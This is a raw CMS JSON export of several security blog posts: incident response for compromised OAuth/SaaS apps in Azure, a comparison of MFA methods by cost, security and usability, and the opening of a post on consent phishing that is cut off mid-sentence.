",[],{},{"nodeType":186,"data":270535,"content":270537},{"uri":270536},"https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens#access-token-lifetime:~:text=The%20default%20lifetime%20of%20an%20access%20token%20is%20variable.%20When%20issued%2C%20the%20default%20lifetime%20of%20an%20access%20token%20is%20assigned%20a%20random%20value%20ranging%20between%2060%2D90%20minutes%20(75%20minutes%20on%20average).",[270538],{"nodeType":173,"value":270539,"marks":270540,"data":270542},"60 to 90 minutes",[270541],{"type":194},{},{"nodeType":173,"value":270544,"marks":270545,"data":270546},", and if a refresh token has been issued, the token holder can request new tokens for ",[],{},{"nodeType":186,"data":270548,"content":270550},{"uri":270549},"https://learn.microsoft.com/en-us/azure/active-directory/develop/refresh-tokens#:~:text=The%20default%20lifetime%20for%20the%20refresh%20tokens%20is%2024%20hours%20for%20single%20page%20apps%20and%2090%20days%20for%20all%20other%20scenarios",[270551],{"nodeType":173,"value":270552,"marks":270553,"data":270555},"up to 90 days",[270554],{"type":194},{},{"nodeType":173,"value":270557,"marks":270558,"data":270559},"! ",[],{},{"nodeType":178,"data":270561,"content":270562},{},[270563],{"nodeType":173,"value":270564,"marks":270565,"data":270566},"So, revoking refresh tokens is an important step as part of the mitigation and recovery steps. This step can be performed with some PowerShell – luckily Microsoft provides pre-generated scripts for you to copy and paste. Click on ‘Permissions’ for the app, followed by ‘Review permissions.’ ",[],{},{"nodeType":312,"data":270568,"content":270572},{"target":270569},{"sys":270570},{"id":270571,"type":317,"linkType":318},"7vuFmlmZbzfNhWHPj8ToHm",[],{"nodeType":178,"data":270574,"content":270575},{},[270576],{"nodeType":173,"value":270577,"marks":270578,"data":270579},"In the new window, click on ‘This application is malicious and I’m compromised.’ This will present you with the necessary PowerShell scripts to remove users from the app, revoke all permissions granted to the app, and finally to revoke refresh tokens associated with the app.",[],{},{"nodeType":312,"data":270581,"content":270585},{"target":270582},{"sys":270583},{"id":270584,"type":317,"linkType":318},"4NnD6WKRHlnzKE0F4GUDEm",[],{"nodeType":235,"data":270587,"content":270588},{},[270589],{"nodeType":173,"value":270590,"marks":270591,"data":270592},"What to do if the initial access token was stolen",[],{},{"nodeType":178,"data":270594,"content":270595},{},[270596],{"nodeType":173,"value":270597,"marks":270598,"data":270599},"The initial access token cannot be revoked. In practice, if an attacker has managed to steal an access token it will be valid for the remainder of its lifespan, which is typically one hour. This is true even if the account is disabled, the compromised app deleted, and all refresh tokens revoked. If you’re responding to an incident, you will need to keep an eye on audit logs for an hour or more after performing the above steps to make sure the valid access token wasn’t still being used to perform actions in the environment.",[],{},{"nodeType":178,"data":270601,"content":270602},{},[270603,270607,270616,270620,270629],{"nodeType":173,"value":270604,"marks":270605,"data":270606},"Microsoft’s response to this was to develop something called ",[],{},{"nodeType":186,"data":270608,"content":270610},{"uri":270609},"https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-continuous-access-evaluation",[270611],{"nodeType":173,"value":270612,"marks":270613,"data":270615},"continuous access evaluation",[270614],{"type":194},{},{"nodeType":173,"value":270617,"marks":270618,"data":270619},". However, they admit in the article that it does not address a scenario where an attacker exfiltrated the token outside of a ",[],{},{"nodeType":186,"data":270621,"content":270623},{"uri":270622},"https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-continuous-access-evaluation#:~:text=Token%20export%20to%20a%20machine%20outside%20of%20a%20trusted%20network%20can%20be%20prevented%20with%20Conditional%20Access%20location%20policies",[270624],{"nodeType":173,"value":270625,"marks":270626,"data":270628},"trusted network",[270627],{"type":194},{},{"nodeType":173,"value":270630,"marks":270631,"data":270632},", in which case conditional access policy enforcement would be required to address the issue. Continuous access evaluation is ideal for handling specific cases of user access into the environment such as employee contract termination, or scenarios where conditional access policies are violated.",[],{},{"nodeType":169,"data":270634,"content":270635},{},[270636],{"nodeType":173,"value":40632,"marks":270637,"data":270638},[],{},{"nodeType":178,"data":270640,"content":270641},{},[270642],{"nodeType":173,"value":270643,"marks":270644,"data":270645},"This article should have given you a better understanding of the most common issues presented when reviewing SaaS apps integrated into your environment. ",[],{},{"nodeType":178,"data":270647,"content":270648},{},[270649],{"nodeType":173,"value":270650,"marks":270651,"data":270652},"Determining whether using an app would result in compromise is not a simple task, especially if you haven’t observed malicious behavior. As such, the best course of action is to consider all angles, which include the business case of users requiring its use, the permission scopes, and whether the vendor’s security practices are in line with your requirements.",[],{},{"nodeType":178,"data":270654,"content":270655},{},[270656],{"nodeType":173,"value":270657,"marks":270658,"data":270659},"SaaS is a new(ish) frontier that can be really daunting to defend against attackers, but it's not impossible to reduce risk without simply blocking access to SaaS. And, remember: denying users access to tools will make them find ways around the limitations.",[],{},{"nodeType":178,"data":270661,"content":270662},{},[270663],{"nodeType":173,"value":270664,"marks":270665,"data":270666},"We hope this article helps you get a better handle on how to determine if you’ve been compromised, and respond to incidents involving SaaS apps and/or OAuth integrations to your core work platforms.",[],{},{"nodeType":312,"data":270668,"content":270671},{"target":270669},{"sys":270670},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":270673,"content":270674},{},[270675],{"nodeType":173,"value":37,"marks":270676,"data":270677},[],{},"How attackers compromise Azure organizations through SaaS apps ","2023-01-03T00:00:00.000Z","how-attackers-compromise-azure-organizations-through-saas-apps",{"items":270682},[270683,270685],{"sys":270684,"name":505},{"id":504},{"sys":270686,"name":509},{"id":508},{"items":270688},[270689],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":270690},{"url":155985},{"__typename":1528,"sys":270692,"content":270694,"title":271423,"synopsis":271424,"hashTags":271425,"publishedDate":271426,"slug":271427,"tagsCollection":271428,"authorsCollection":271434},{"id":270693},"73JjdrO5GKRzYum97MqJ9q",{"json":270695},{"data":270696,"content":270697,"nodeType":165},{},[270698,270714,270721,270764,270771,270816,270823,271181,271187,271193,271200,271207,271214,271220,271227,271234,271241,271248,271255,271262,271269,271276,271295,271302,271309,271316,271323,271330,271360,271367,271374,271381,271388,271395,271402,271405,271412,271417],{"data":270699,"content":270700,"nodeType":178},{},[270701,270705,270710],{"data":270702,"marks":270703,"value":270704,"nodeType":173},{},[],"Before we start, ",{"data":270706,"marks":270707,"value":270709,"nodeType":173},{},[270708],{"type":370},"MFA with any method is better than no MFA at all",{"data":270711,"marks":270712,"value":270713,"nodeType":173},{},[],". Although some methods are better than others, they're all leagues ahead of passwords alone. If, for whatever reason, you can only implement MFA using a weaker second factor, you should still do it. You can always improve later and you'll have made a significant improvement even with the weaker second factor.",{"data":270715,"content":270716,"nodeType":178},{},[270717],{"data":270718,"marks":270719,"value":270720,"nodeType":173},{},[],"So, how can one factor be better than others? Here's how we think about it:",{"data":270722,"content":270723,"nodeType":250},{},[270724,270734,270744,270754],{"data":270725,"content":270726,"nodeType":254},{},[270727],{"data":270728,"content":270729,"nodeType":178},{},[270730],{"data":270731,"marks":270732,"value":270733,"nodeType":173},{},[],"User experience: how easy is it to use?",{"data":270735,"content":270736,"nodeType":254},{},[270737],{"data":270738,"content":270739,"nodeType":178},{},[270740],{"data":270741,"marks":270742,"value":270743,"nodeType":173},{},[],"Security: how easy is it for someone to compromise?",{"data":270745,"content":270746,"nodeType":254},{},[270747],{"data":270748,"content":270749,"nodeType":178},{},[270750],{"data":270751,"marks":270752,"value":270753,"nodeType":173},{},[],"Cost: do you need to upgrade your SaaS license, or buy physical bits?",{"data":270755,"content":270756,"nodeType":254},{},[270757],{"data":270758,"content":270759,"nodeType":178},{},[270760],{"data":270761,"marks":270762,"value":270763,"nodeType":173},{},[],"Support: how widely can it be used?",{"data":270765,"content":270766,"nodeType":235},{},[270767],{"data":270768,"marks":270769,"value":270770,"nodeType":173},{},[],"Just want the answers? ",{"data":270772,"content":270773,"nodeType":250},{},[270774,270784,270806],{"data":270775,"content":270776,"nodeType":254},{},[270777],{"data":270778,"content":270779,"nodeType":178},{},[270780],{"data":270781,"marks":270782,"value":270783,"nodeType":173},{},[],"Using an app on your phone, like Microsoft or Google Authenticator, to receive notifications or use a one-time password are the top all-round options today - they're free, intuitive for users, relatively easy to set up, and widely supported. ",{"data":270785,"content":270786,"nodeType":254},{},[270787],{"data":270788,"content":270789,"nodeType":178},{},[270790,270794,270802],{"data":270791,"marks":270792,"value":270793,"nodeType":173},{},[],"The gold standard is a FIDO2-capable security key, like the ",{"data":270795,"content":270797,"nodeType":186},{"uri":270796},"https://www.yubico.com/products/yubikey-5-overview/",[270798],{"data":270799,"marks":270800,"value":270801,"nodeType":173},{},[],"YubiKey 5 series",{"data":270803,"marks":270804,"value":270805,"nodeType":173},{},[],", or a security key built-in to your device, like Touch ID  - it's the most secure, provides the best user experience, but has an upfront cost as each user will need a key or a compatible device. The main drawback today is they aren't supported on all platforms yet so might not be an option everywhere.",{"data":270807,"content":270808,"nodeType":254},{},[270809],{"data":270810,"content":270811,"nodeType":178},{},[270812],{"data":270813,"marks":270814,"value":270815,"nodeType":173},{},[],"Factors that rely on your phone number, such as SMS and phone calls should be avoided if possible as they are the least secure and provide the worst user experience.",{"data":270817,"content":270818,"nodeType":178},{},[270819],{"data":270820,"marks":270821,"value":270822,"nodeType":173},{},[],"Here's a summary:",{"data":270824,"content":270825,"nodeType":1653},{},[270826,270878,270930,270980,271032,271081,271132],{"data":270827,"content":270828,"nodeType":1657},{},[270829,270839,270849,270858,270868],{"data":270830,"content":270831,"nodeType":1661},{},[270832],{"data":270833,"content":270834,"nodeType":178},{},[270835],{"data":270836,"marks":270837,"value":270838,"nodeType":173},{},[],"Method",{"data":270840,"content":270841,"nodeType":1661},{},[270842],{"data":270843,"content":270844,"nodeType":178},{},[270845],{"data":270846,"marks":270847,"value":270848,"nodeType":173},{},[],"User experience",{"data":270850,"content":270851,"nodeType":1661},{},[270852],{"data":270853,"content":270854,"nodeType":178},{},[270855],{"data":270856,"marks":270857,"value":266156,"nodeType":173},{},[],{"data":270859,"content":270860,"nodeType":1661},{},[270861],{"data":270862,"content":270863,"nodeType":178},{},[270864],{"data":270865,"marks":270866,"value":270867,"nodeType":173},{},[],"Cost",{"data":270869,"content":270870,"nodeType":1661},{},[270871],{"data":270872,"content":270873,"nodeType":178},{},[270874],{"data":270875,"marks":270876,"value":270877,"nodeType":173},{},[],"Support",{"data":270879,"content":270880,"nodeType":1657},{},[270881,270891,270901,270910,270920],{"data":270882,"content":270883,"nodeType":1687},{},[270884],{"data":270885,"content":270886,"nodeType":178},{},[270887],{"data":270888,"marks":270889,"value":270890,"nodeType":173},{},[],"App Notification",{"data":270892,"content":270893,"nodeType":1687},{},[270894],{"data":270895,"content":270896,"nodeType":178},{},[270897],{"data":270898,"marks":270899,"value":270900,"nodeType":173},{},[],"Good",{"data":270902,"content":270903,"nodeType":1687},{},[270904],{"data":270905,"content":270906,"nodeType":178},{},[270907],{"data":270908,"marks":270909,"value":270900,"nodeType":173},{},[],{"data":270911,"content":270912,"nodeType":1687},{},[270913],{"data":270914,"content":270915,"nodeType":178},{},[270916],{"data":270917,"marks":270918,"value":270919,"nodeType":173},{},[],"Free",{"data":270921,"content":270922,"nodeType":1687},{},[270923],{"data":270924,"content":270925,"nodeType":178},{},[270926],{"data":270927,"marks":270928,"value":270929,"nodeType":173},{},[],"Widely supported",{"data":270931,"content":270932,"nodeType":1657},{},[270933,270943,270953,270962,270971],{"data":270934,"content":270935,"nodeType":1687},{},[270936],{"data":270937,"content":270938,"nodeType":178},{},[270939],{"data":270940,"marks":270941,"value":270942,"nodeType":173},{},[],"App code",{"data":270944,"content":270945,"nodeType":1687},{},[270946],{"data":270947,"content":270948,"nodeType":178},{},[270949],{"data":270950,"marks":270951,"value":270952,"nodeType":173},{},[],"Moderate",{"data":270954,"content":270955,"nodeType":1687},{},[270956],{"data":270957,"content":270958,"nodeType":178},{},[270959],{"data":270960,"marks":270961,"value":270900,"nodeType":173},{},[],{"data":270963,"content":270964,"nodeType":1687},{},[270965],{"data":270966,"content":270967,"nodeType":178},{},[270968],{"data":270969,"marks":270970,"value":270919,"nodeType":173},{},[],{"data":270972,"content":270973,"nodeType":1687},{},[270974],{"data":270975,"content":270976,"nodeType":178},{},[270977],{"data":270978,"marks":270979,"value":270929,"nodeType":173},{},[],{"data":270981,"content":270982,"nodeType":1657},{},[270983,270993,271003,271012,271022],{"data":270984,"content":270985,"nodeType":1687},{},[270986],{"data":270987,"content":270988,"nodeType":178},{},[270989],{"data":270990,"marks":270991,"value":270992,"nodeType":173},{},[],"Security key (external)",{"data":270994,"content":270995,"nodeType":1687},{},[270996],{"data":270997,"content":270998,"nodeType":178},{},[270999],{"data":271000,"marks":271001,"value":271002,"nodeType":173},{},[],"Best",{"data":271004,"content":271005,"nodeType":1687},{},[271006],{"data":271007,"content":271008,"nodeType":178},{},[271009],{"data":271010,"marks":271011,"value":271002,"nodeType":173},{},[],{"data":271013,"content":271014,"nodeType":1687},{},[271015],{"data":271016,"content":271017,"nodeType":178},{},[271018],{"data":271019,"marks":271020,"value":271021,"nodeType":173},{},[],"Expensive",{"data":271023,"content":271024,"nodeType":1687},{},[271025],{"data":271026,"content":271027,"nodeType":178},{},[271028],{"data":271029,"marks":271030,"value":271031,"nodeType":173},{},[],"Some platforms",{"data":271033,"content":271034,"nodeType":1657},{},[271035,271045,271054,271063,271072],{"data":271036,"content":271037,"nodeType":1687},{},[271038],{"data":271039,"content":271040,"nodeType":178},{},[271041],{"data":271042,"marks":271043,"value":271044,"nodeType":173},{},[],"Security key (internal)",{"data":271046,"content":271047,"nodeType":1687},{},[271048],{"data":271049,"content":271050,"nodeType":178},{},[271051],{"data":271052,"marks":271053,"value":271002,"nodeType":173},{},[],{"data":271055,"content":271056,"nodeType":1687},{},[271057],{"data":271058,"content":271059,"nodeType":178},{},[271060],{"data":271061,"marks":271062,"value":271002,"nodeType":173},{},[],{"data":271064,"content":271065,"nodeType":1687},{},[271066],{"data":271067,"content":271068,"nodeType":178},{},[271069],{"data":271070,"marks":271071,"value":270919,"nodeType":173},{},[],{"data":271073,"content":271074,"nodeType":1687},{},[271075],{"data":271076,"content":271077,"nodeType":178},{},[271078],{"data":271079,"marks":271080,"value":271031,"nodeType":173},{},[],{"data":271082,"content":271083,"nodeType":1657},{},[271084,271094,271104,271113,271123],{"data":271085,"content":271086,"nodeType":1687},{},[271087],{"data":271088,"content":271089,"nodeType":178},{},[271090],{"data":271091,"marks":271092,"value":271093,"nodeType":173},{},[],"SMS",{"data":271095,"content":271096,"nodeType":1687},{},[271097],{"data":271098,"content":271099,"nodeType":178},{},[271100],{"data":271101,"marks":271102,"value":271103,"nodeType":173},{},[],"Poor",{"data":271105,"content":271106,"nodeType":1687},{},[271107],{"data":271108,"content":271109,"nodeType":178},{},[271110],{"data":271111,"marks":271112,"value":271103,"nodeType":173},{},[],{"data":271114,"content":271115,"nodeType":1687},{},[271116],{"data":271117,"content":271118,"nodeType":178},{},[271119],{"data":271120,"marks":271121,"value":271122,"nodeType":173},{},[],"Cheap",{"data":271124,"content":271125,"nodeType":1687},{},[271126],{"data":271127,"content":271128,"nodeType":178},{},[271129],{"data":271130,"marks":271131,"value":270929,"nodeType":173},{},[],{"data":271133,"content":271134,"nodeType":1657},{},[271135,271145,271154,271163,271172],{"data":271136,"content":271137,"nodeType":1687},{},[271138],{"data":271139,"content":271140,"nodeType":178},{},[271141],{"data":271142,"marks":271143,"value":271144,"nodeType":173},{},[],"Phone call",{"data":271146,"content":271147,"nodeType":1687},{},[271148],{"data":271149,"content":271150,"nodeType":178},{},[271151],{"data":271152,"marks":271153,"value":271103,"nodeType":173},{},[],{"data":271155,"content":271156,"nodeType":1687},{},[271157],{"data":271158,"content":271159,"nodeType":178},{},[271160],{"data":271161,"marks":271162,"value":271103,"nodeType":173},{},[],{"data":271164,"content":271165,"nodeType":1687},{},[271166],{"data":271167,"content":271168,"nodeType":178},{},[271169],{"data":271170,"marks":271171,"value":271122,"nodeType":173},{},[],{"data":271173,"content":271174,"nodeType":1687},{},[271175],{"data":271176,"content":271177,"nodeType":178},{},[271178],{"data":271179,"marks":271180,"value":270929,"nodeType":173},{},[],{"data":271182,"content":271186,"nodeType":312},{"target":271183},{"sys":271184},{"id":271185,"type":317,"linkType":318},"7rgrP5FFAKG63lscwhAsW1",[],{"data":271188,"content":271189,"nodeType":235},{},[271190],{"data":271191,"marks":271192,"value":270890,"nodeType":173},{},[],{"data":271194,"content":271195,"nodeType":178},{},[271196],{"data":271197,"marks":271198,"value":271199,"nodeType":173},{},[],"One of the most common methods today is the app notification. Using an app on your phone, like Microsoft Authenticator, to receive a push notification when you login.",{"data":271201,"content":271202,"nodeType":178},{},[271203],{"data":271204,"marks":271205,"value":271206,"nodeType":173},{},[],"Free, easy to use, and secure - this is a good choice if your users all have devices to install the app on and will reliably have a network connection to receive the notification.",{"data":271208,"content":271209,"nodeType":178},{},[271210],{"data":271211,"marks":271212,"value":271213,"nodeType":173},{},[],"Your challenges with using this method will be getting the app setup on everyone's device, getting everyone enrolled, and making sure users understand to only hit approve when they actually performed a login (seriously).",{"data":271215,"content":271219,"nodeType":312},{"target":271216},{"sys":271217},{"id":271218,"type":317,"linkType":318},"4ybLnYAdHltdWCluLbr4di",[],{"data":271221,"content":271222,"nodeType":235},{},[271223],{"data":271224,"marks":271225,"value":271226,"nodeType":173},{},[],"App Code",{"data":271228,"content":271229,"nodeType":178},{},[271230],{"data":271231,"marks":271232,"value":271233,"nodeType":173},{},[],"The early days of MFA looked like RSA tokens; those devices you used to have to carry on a key chain with a code that changed every minute. Those devices worked by having a \"seed\" value that both the device and the server knew which changed predictably. So long as that seed value stayed safe, this provided a convenient second factor for users that was difficult to compromise.",{"data":271235,"content":271236,"nodeType":178},{},[271237],{"data":271238,"marks":271239,"value":271240,"nodeType":173},{},[],"Today, this approach is more common via an app, where the app provides a code that changes every minute, but the concept is exactly the same.",{"data":271242,"content":271243,"nodeType":178},{},[271244],{"data":271245,"marks":271246,"value":271247,"nodeType":173},{},[],"This approach uses what is officially called One Time Passwords (OTP) but is often just referred to as an app code. It has some advantages, such as not needing signal after setup which can be handy if that's a concern. ",{"data":271249,"content":271250,"nodeType":178},{},[271251],{"data":271252,"marks":271253,"value":271254,"nodeType":173},{},[],"However, as was true of the RSA tokens of the past, if the seed value is compromised all future values can be predicted. The odds of this happening in practice are exceptionally low so this remains a good choice.",{"data":271256,"content":271257,"nodeType":178},{},[271258],{"data":271259,"marks":271260,"value":271261,"nodeType":173},{},[],"Your challenges with using this method will again be mostly in rolling it out to all users and getting everyone setup.",{"data":271263,"content":271264,"nodeType":235},{},[271265],{"data":271266,"marks":271267,"value":271268,"nodeType":173},{},[],"Text message / phone call",{"data":271270,"content":271271,"nodeType":178},{},[271272],{"data":271273,"marks":271274,"value":271275,"nodeType":173},{},[],"As MFA gained popularity, receiving a code via text message (SMS), or sometimes a phone call, quickly became the de-facto method. Before everyone had smartphones and therefore the ability to install apps, using text messages or phone calls was the only way to implement MFA without having to provision RSA tokens for everyone in the team.",{"data":271277,"content":271278,"nodeType":178},{},[271279,271283,271291],{"data":271280,"marks":271281,"value":271282,"nodeType":173},{},[],"The major downside to using these methods is their reliance on the security of the phone number. If attackers really want to target an account, and they know the phone number used for MFA, they can try something called ",{"data":271284,"content":271286,"nodeType":186},{"uri":271285},"https://en.wikipedia.org/wiki/SIM_swap_scam",[271287],{"data":271288,"marks":271289,"value":271290,"nodeType":173},{},[],"SIM-swapping",{"data":271292,"marks":271293,"value":271294,"nodeType":173},{},[]," to hijack the phone number, and hence nullify the MFA.",{"data":271296,"content":271297,"nodeType":178},{},[271298],{"data":271299,"marks":271300,"value":271301,"nodeType":173},{},[],"The most important thing to note in that scenario is how targeted it is. With no MFA, any attacker on the Internet can simply guess passwords on an account - the cost is extremely low. To bypass SMS or phone call MFA using SIM swapping has a significantly higher cost. The attack is definitely practical, but would only happen when you're specifically targeted.",{"data":271303,"content":271304,"nodeType":178},{},[271305],{"data":271306,"marks":271307,"value":271308,"nodeType":173},{},[],"Additionally, the user experience isn't as good. Firstly, the user must have mobile signal to receive the SMS or call. Secondly, there can often be a delay in delivery, due to the less-reliable mobile network. Finally, there is almost always a usage cost associated with these methods, since it costs money to send SMSs or make phone calls.",{"data":271310,"content":271311,"nodeType":178},{},[271312],{"data":271313,"marks":271314,"value":271315,"nodeType":173},{},[],"Because of this, SMS or phone calls are often considered least desirable MFA methods today.",{"data":271317,"content":271318,"nodeType":235},{},[271319],{"data":271320,"marks":271321,"value":271322,"nodeType":173},{},[],"Security keys",{"data":271324,"content":271325,"nodeType":178},{},[271326],{"data":271327,"marks":271328,"value":271329,"nodeType":173},{},[],"FIDO2 is the name for a set of authentication protocols and standards developed by a consortium of tech companies to be the future of authentication. FIDO2 solves a lot of the problems we've dealt with in the past: it's secure, usable, impossible to spoof.",{"data":271331,"content":271332,"nodeType":178},{},[271333,271337,271345,271349,271356],{"data":271334,"marks":271335,"value":271336,"nodeType":173},{},[],"Without digging into the weeds of how that works (",{"data":271338,"content":271340,"nodeType":186},{"uri":271339},"https://fidoalliance.org/fido2/",[271341],{"data":271342,"marks":271343,"value":271344,"nodeType":173},{},[],"the official page from the FIDO alliance is worth a read if you're interested",{"data":271346,"marks":271347,"value":271348,"nodeType":173},{},[],"), you will need what's commonly referred to as a \"security key\" to make use of it. This is a small physical device, often plugged into your USB port - modern devices that understand FIDO2, like the ",{"data":271350,"content":271351,"nodeType":186},{"uri":270796},[271352],{"data":271353,"marks":271354,"value":271355,"nodeType":173},{},[],"YubiKey 5 Series",{"data":271357,"marks":271358,"value":271359,"nodeType":173},{},[],", are preferable. Once setup, you simply touch the key on login and the magic of cryptography ensures a high degree of security.",{"data":271361,"content":271362,"nodeType":178},{},[271363],{"data":271364,"marks":271365,"value":271366,"nodeType":173},{},[],"In fact, this approach is so secure, it is the basis of a \"passwordless\" revolution, where this strong factor of authentication can feasibly be used as a single-factor of authentication, and users don't even need to remember passwords anymore. Though in its infancy at the moment, expect to hear more about that in the coming years.",{"data":271368,"content":271369,"nodeType":178},{},[271370],{"data":271371,"marks":271372,"value":271373,"nodeType":173},{},[],"The primary drawback of this method is the cost, with devices typically costing around $50 each. Also, although you can expect them to be supported on major platforms, they aren't supported as widely as other methods just yet.",{"data":271375,"content":271376,"nodeType":178},{},[271377],{"data":271378,"marks":271379,"value":271380,"nodeType":173},{},[],"If you are unable to justify their cost for all users, a common implementation is to use security keys for high privilege accounts.",{"data":271382,"content":271383,"nodeType":235},{},[271384],{"data":271385,"marks":271386,"value":271387,"nodeType":173},{},[],"Built-in security keys",{"data":271389,"content":271390,"nodeType":178},{},[271391],{"data":271392,"marks":271393,"value":271394,"nodeType":173},{},[],"Many modern mobile devices like laptops, tablets and phones have built-in security keys (e.g. Apple TouchId,  Android phones, and Windows Hello). These have many of the advantages of stand-alone security keys, but without the cost!",{"data":271396,"content":271397,"nodeType":178},{},[271398],{"data":271399,"marks":271400,"value":271401,"nodeType":173},{},[],"Support for these keys is a fairly recent development and is still ongoing but opens up an exciting future where users will increasingly be able to very easily add a second factor, or even go passwordless, in a secure way, without much effort or thought.",{"data":271403,"content":271404,"nodeType":231},{},[],{"data":271406,"content":271407,"nodeType":178},{},[271408],{"data":271409,"marks":271410,"value":271411,"nodeType":173},{},[],"In conclusion there are multiple options you can choose from to fit almost any scenario you have. While some options are better than others, even the worst option is still a massive improvement on passwords alone. In the end, the best MFA method is the one you can start rolling out today, you can always improve down the line.",{"data":271413,"content":271416,"nodeType":312},{"target":271414},{"sys":271415},{"id":209109,"type":317,"linkType":318},[],{"data":271418,"content":271419,"nodeType":178},{},[271420],{"data":271421,"marks":271422,"value":37,"nodeType":173},{},[],"Which MFA methods should you use?","SMS, Authenticator apps, Security Keys, and more! We compare them from a user experience, security, cost, and security aspect.",[182376],"2021-03-15T00:00:00.000+01:00","which-mfa-methods-should-you-use",{"items":271429},[271430,271432],{"sys":271431,"name":26133},{"id":26132},{"sys":271433,"name":26137},{"id":26136},{"items":271435},[271436],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":271437},{"url":19129},{"__typename":1528,"sys":271439,"content":271440,"title":271616,"synopsis":271617,"hashTags":118,"publishedDate":271618,"slug":271619,"tagsCollection":271620,"authorsCollection":271626},{"id":269414},{"json":271441},{"nodeType":165,"data":271442,"content":271443},{},[271444,271451,271458,271464,271480,271486,271493,271500,271527,271533,271552,271570,271589],{"nodeType":178,"data":271445,"content":271446},{},[271447],{"nodeType":173,"value":271448,"marks":271449,"data":271450},"With more platforms adding support for Multi-factor Authentication (MFA) and users increasingly adopting it to secure their accounts, attackers are adapting and moving to new methods of compromising user accounts. In this post we’ll take a look at consent phishing and how it is being used to bypass MFA and also skirt key attributes of phishing that are taught in traditional user awareness campaigns, such as links to untrusted domains.",[],{},{"nodeType":178,"data":271452,"content":271453},{},[271454],{"nodeType":173,"value":271455,"marks":271456,"data":271457},"Imagine yourself sitting down at your desk first thing on a Monday morning, cup of coffee steaming next to your keyboard as you click through your backlog of emails. You open the below email and you see that Karl has shared a financial report with you. ",[],{},{"nodeType":312,"data":271459,"content":271463},{"target":271460},{"sys":271461},{"id":271462,"type":317,"linkType":318},"7zysXleQdpE6isqi9OU56l",[],{"nodeType":178,"data":271465,"content":271466},{},[271467,271471,271476],{"nodeType":173,"value":271468,"marks":271469,"data":271470},"Maybe you’ve been waiting for the latest financials or you suspect this was sent erroneously but you’re curious and want to take a peek. When you click the link you are presented with a prompt that with your Monday brain looks just like the “Yes give me access” prompt you’ve clicked through a thousand times. I mean, it's a ",[],{},{"nodeType":173,"value":271472,"marks":271473,"data":271475},"microsoftonline.com",[271474],{"type":370},{},{"nodeType":173,"value":271477,"marks":271478,"data":271479}," domain, it's https and there’s a green tick in the corner so everything looks fine. ",[],{},{"nodeType":312,"data":271481,"content":271485},{"target":271482},{"sys":271483},{"id":271484,"type":317,"linkType":318},"6nPueTKEjLphqlytbQ0gcx",[],{"nodeType":178,"data":271487,"content":271488},{},[271489],{"nodeType":173,"value":271490,"marks":271491,"data":271492},"If you’d looked closely you may have noticed that this was in fact asking you to approve access rather than granting you access. But with your muscle memory in full control you click “Accept” before even glancing at the screen. You wait for the spreadsheet to open but are presented with a generic “File does not exist” error page. Oh well, apparently Karl realised his mistake and deleted the file or revoked your access. Onto the next email.",[],{},{"nodeType":178,"data":271494,"content":271495},{},[271496],{"nodeType":173,"value":271497,"marks":271498,"data":271499},"And just like that you’ve been consent phished. You’ve just granted the attackers permanent access to your account, which they retain even if you change your password or have MFA enabled. Chances are the attacker’s tools will immediately start downloading every piece of data you just granted them access to, which they can then explore at their leisure. ",[],{},{"nodeType":178,"data":271501,"content":271502},{},[271503,271507,271514,271517,271524],{"nodeType":173,"value":271504,"marks":271505,"data":271506},"To spot this you need to audit the apps you’ve approved, something you are doing regularly, right? Seriously though, this isn’t something many people check. These integrations are designed to be as seamless as possible and not to get in your way. But if this has piqued your interest you can check what access you have personally granted on ",[],{},{"nodeType":186,"data":271508,"content":271510},{"uri":271509},"https://myaccount.google.com/permissions",[271511],{"nodeType":173,"value":211147,"marks":271512,"data":271513},[],{},{"nodeType":173,"value":933,"marks":271515,"data":271516},[],{},{"nodeType":186,"data":271518,"content":271520},{"uri":271519},"https://myapps.microsoft.com/",[271521],{"nodeType":173,"value":211157,"marks":271522,"data":271523},[],{},{"nodeType":173,"value":1477,"marks":271525,"data":271526},[],{},{"nodeType":312,"data":271528,"content":271532},{"target":271529},{"sys":271530},{"id":271531,"type":317,"linkType":318},"BPIX02LWblUNnkQw1TFWD",[],{"nodeType":178,"data":271534,"content":271535},{},[271536,271540,271548],{"nodeType":173,"value":271537,"marks":271538,"data":271539},"If you’d been paying attention when you clicked “Accept” you might have noticed that you were granting some pretty serious permissions here. These permissions allow the attackers to read and write any files you have access to - they could download all these files and then delete them. The attackers also got permission to send emails as you. They could send emails to your colleagues from you and phish them too, this isn’t impersonation where the email just “looks” like it came from you, the email DID come from you. Lastly the attackers asked for permission to manipulate your Outlook settings, with this they could set up a ",[],{},{"nodeType":186,"data":271541,"content":271543},{"uri":271542},"/features/detect-malicious-mail-rules/",[271544],{"nodeType":173,"value":271545,"marks":271546,"data":271547},"mail forwarding rule",[],{},{"nodeType":173,"value":271549,"marks":271550,"data":271551}," so that they get copies of all your emails forwarded to them directly without even having to log in. And all of this happens until you delete the underlying OAuth app.",[],{},{"nodeType":178,"data":271553,"content":271554},{},[271555,271559,271566],{"nodeType":173,"value":271556,"marks":271557,"data":271558},"In a ",[],{},{"nodeType":186,"data":271560,"content":271562},{"uri":271561},"https://www.microsoft.com/security/blog/2020/07/08/protecting-remote-workforce-application-attacks-consent-phishing/",[271563],{"nodeType":173,"value":148689,"marks":271564,"data":271565},[],{},{"nodeType":173,"value":271567,"marks":271568,"data":271569}," Microsoft warns that these attacks are on the rise. One notable example of this comes from the SANS Institute. They reported in August of 2020 that they had fallen victim to one of these attacks. As part of the investigation they produced a report with details on how the attackers managed to convince an employee to install a malicious Microsoft 365 add-in to gain access. ",[],{},{"nodeType":178,"data":271571,"content":271572},{},[271573,271577,271585],{"nodeType":173,"value":271574,"marks":271575,"data":271576},"So what can you do about this threat today? The only fool proof method of preventing this kind of attack is to prevent users from granting access to third party apps. This is terrible for users though, and you’ll be missing out on all the productivity benefits these apps can bring. A more balanced approach is to let users find and request apps, but have administrators approve the apps. More and more platforms (including Microsoft 365 and Slack) are offering built-in “admin consent” workflows to make getting a second pair of eyes on new apps even easier. You can also make it even easier for users  by pre-approving widely used apps from trusted publishers and users won’t even notice there is new protection in place 99% of the time. We are also actively working on this problem and if you would like to join our ",[],{},{"nodeType":186,"data":271578,"content":271580},{"uri":271579},"/features/secure-oauth-permissions-and-applications/",[271581],{"nodeType":173,"value":271582,"marks":271583,"data":271584},"early access 